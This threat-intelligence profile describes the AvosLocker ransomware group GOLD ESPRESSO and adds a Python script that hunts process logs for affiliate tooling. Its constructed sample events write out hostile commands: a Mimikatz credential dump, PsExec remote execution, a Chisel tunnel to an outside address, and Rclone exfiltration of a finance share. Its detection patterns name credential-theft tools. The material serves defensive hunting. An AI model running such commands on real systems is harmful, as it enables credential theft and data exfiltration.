GOLD ESPRESSO
SUMMARY
GOLD ESPRESSO was a financially motivated cybercrime group that operated the AvosLocker name-and-shame ransomware-as-a-service (RaaS). The threat group provided hosting for stolen data and conducted negotiations on behalf of its affiliates. GOLD ESPRESSO began posting victim names to its leak site in July 2021 and continued to do so until May 2023, when the group ceased naming victims. A persona responsible for recruiting affiliates on the Ramp underground forum last posted to it in January 2023.
AvosLocker was deployed against organizations in multiple sectors, including critical infrastructure across the United States and Canada. The group was observed on underground forums seeking network access to companies with revenue of over 50 million USD.
Tactics, techniques and procedures (TTPs) for deploying AvosLocker varied between GOLD ESPRESSO's affiliates. CTU researchers observed affiliates gaining initial access to victim networks through scan-and-exploit activity, scanning for and exploiting vulnerable internet-facing systems. The U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) reported affiliates using a variety of open-source and legitimate tools to conduct AvosLocker operations. These included Splashtop Streamer, AnyDesk and Atera Agent for remote access; the Microsoft Sysinternals PsExec tool (a downloadable utility, not a component shipped with Windows) for remote execution; the Ligolo and Chisel tunneling tools; LaZagne and Mimikatz for harvesting credentials; the Cobalt Strike and Sliver frameworks for command and control (C2); and FileZilla and Rclone for data exfiltration.
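The tool list above is a natural starting point for a hunt across process-creation telemetry, since most of it is dual-use software that is recognizable by name until an affiliate renames it. The script below is an added example written for this page, not Secureworks, FBI or CISA code: it maps each tool to the operational stage named in the text, runs the patterns over a handful of constructed process-creation events, lets the analyst allow-list tooling the organization legitimately uses (AnyDesk, in the sample), and summarizes which stages of the intrusion chain appear. The binary names, the pipe-delimited event format and the events themselves are assumptions made for the example.

```python
"""Hunt process-creation telemetry for the tooling FBI/CISA reported
AvosLocker affiliates using (remote access, execution, tunneling,
credential access, C2, exfiltration).

Added example for this page, not Secureworks, FBI or CISA code.
Binary names and the log format are assumptions; events are constructed.
"""
import re
from typing import Iterable

# Tool -> (stage named in the text, regex over "image path + command line").
# Default binary names are assumptions. A renamed binary evades a name match,
# so pair this with hash, PE-metadata or behavioural telemetry in production.
TOOL_PATTERNS = {
    "Splashtop Streamer": ("remote access", r"srserver\.exe|splashtop"),
    "AnyDesk":            ("remote access", r"anydesk\.exe"),
    "Atera Agent":        ("remote access", r"ateraagent\.exe"),
    "PsExec":             ("execution", r"psexec(64)?\.exe|psexesvc\.exe"),
    "Ligolo":             ("tunneling", r"ligolo"),
    "Chisel":             ("tunneling", r"chisel(\.exe)?\b.*\b(client|server)\b"),
    "LaZagne":            ("credential access", r"lazagne"),
    "Mimikatz":           ("credential access", r"mimikatz|sekurlsa::|lsadump::"),
    "Cobalt Strike":      ("command and control", r"beacon\.(exe|dll)"),
    "Sliver":             ("command and control", r"sliver-(client|server)"),
    "FileZilla":          ("exfiltration", r"filezilla\.exe"),
    "Rclone":             ("exfiltration", r"rclone(\.exe)?\b.*\b(copy|sync|move)\b"),
}
COMPILED = {tool: (stage, re.compile(pat, re.IGNORECASE))
            for tool, (stage, pat) in TOOL_PATTERNS.items()}

# Constructed events: timestamp|host|user|image|command line. Hosts, users,
# paths and the 203.0.113.10 address are invented for this example.
SAMPLE_EVENTS = [
    "2023-05-01T02:10:11Z|FS01|CORP\\svc_backup|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "2023-05-01T02:11:40Z|FS01|CORP\\admin|C:\\Temp\\PsExec64.exe|PsExec64.exe -accepteula \\\\FS02 -s cmd.exe",
    "2023-05-01T02:12:05Z|FS02|NT AUTHORITY\\SYSTEM|C:\\Windows\\PSEXESVC.exe|PSEXESVC.exe",
    "2023-05-01T02:15:22Z|FS02|CORP\\admin|C:\\Temp\\mimikatz.exe|mimikatz.exe privilege::debug sekurlsa::logonpasswords exit",
    "2023-05-01T02:20:00Z|FS02|CORP\\admin|C:\\ProgramData\\chisel.exe|chisel.exe client 203.0.113.10:8080 R:socks",
    "2023-05-01T03:01:00Z|FS01|CORP\\admin|C:\\Tools\\rclone.exe|rclone.exe copy D:\\Shares\\Finance mega:exfil --transfers 16",
    "2023-05-01T03:30:00Z|WS07|CORP\\jsmith|C:\\Program Files\\AnyDesk\\AnyDesk.exe|AnyDesk.exe",
]


def parse_event(line: str) -> dict:
    """Split one pipe-delimited event; the command line may itself contain spaces."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def hunt(lines: Iterable[str], sanctioned: frozenset = frozenset()) -> list:
    """Return one finding per event that matches a tool not in `sanctioned`.

    `sanctioned` holds tool names the organization legitimately runs (for
    example an approved RMM agent); they are skipped to cut analyst noise.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        haystack = f"{ev['image']} {ev['cmdline']}"
        for tool, (stage, rx) in COMPILED.items():
            if tool in sanctioned or not rx.search(haystack):
                continue
            findings.append({**ev, "tool": tool, "stage": stage})
            break  # one tool attribution per event is enough for triage
    return findings


def stages_seen(findings: list) -> list:
    """Distinct stages in first-seen order: how far the intrusion progressed."""
    seen = []
    for f in findings:
        if f["stage"] not in seen:
            seen.append(f["stage"])
    return seen


if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS, sanctioned=frozenset({"AnyDesk"}))
    for f in hits:
        print(f"{f['ts']} {f['host']:<5} {f['stage']:<19} {f['tool']:<9} {f['cmdline']}")
    print("stages:", " -> ".join(stages_seen(hits)))
```

Run as-is, the svchost event produces no finding, AnyDesk is suppressed by the allow-list, and the remaining hits read as execution, credential access, tunneling and exfiltration in sequence, which is the shape of the post-access activity the text describes. The allow-list is deliberately a parameter rather than a hard-coded exclusion: an approved RMM tool launched by an unexpected user or on a server that never uses it is still worth a second look, so a production version would scope the exemption by host or account rather than by tool name alone.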